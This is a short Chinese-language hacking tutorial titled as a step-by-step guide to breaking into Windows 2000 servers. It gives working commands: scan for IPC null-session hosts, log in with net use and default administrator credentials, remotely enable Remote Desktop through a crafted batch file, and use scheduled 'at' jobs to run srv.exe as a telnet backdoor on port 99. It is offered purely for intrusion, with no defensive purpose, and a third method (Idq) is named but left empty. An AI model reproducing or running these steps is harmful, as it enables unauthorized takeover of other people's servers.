手把手教你入侵win2000server系統(tǒng)
----------------------------------------
小榕流光4.7掃描存在空連接(ipc)漏洞主機(jī)
我們可以利用掃描時(shí)間.
建立幾種登入模式
1、3389
2、Telnet
3、Idq
----------------------------------------
1、3389入侵
在本地利用DOS命令edit建立.bat后綴批處理文件(文件名隨意)
echo [Components] > c:\sql
echo TSEnable = on >>
c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
net use \\ip地址\ipc$密碼/user:用戶名(一般默認(rèn):administrator)
利用at time獲取對(duì)方服務(wù)器時(shí)間。
copy路徑:\xxx.bat \\ip地址\$c:\winnt
at time 00:00:00 xxx.bat
服務(wù)器執(zhí)行命令后,服務(wù)器將重新啟動(dòng),利用3389登陸(登入器軟件區(qū)有
2、Telnet入侵
在流光早期版本中含有srv.exe
net use \\ip地址\ipc$密碼/user:用戶名(一般默認(rèn):administrator)
利用at time獲取對(duì)方服務(wù)器時(shí)間。
copy路徑:\srv.exe \\ip地址\$c:\winnt
at time 00:00:00 srv.exe
telnet \\ip地址端口(默認(rèn)99)
此時(shí)你想做什么就做什么吧。呵呵
3、Idq
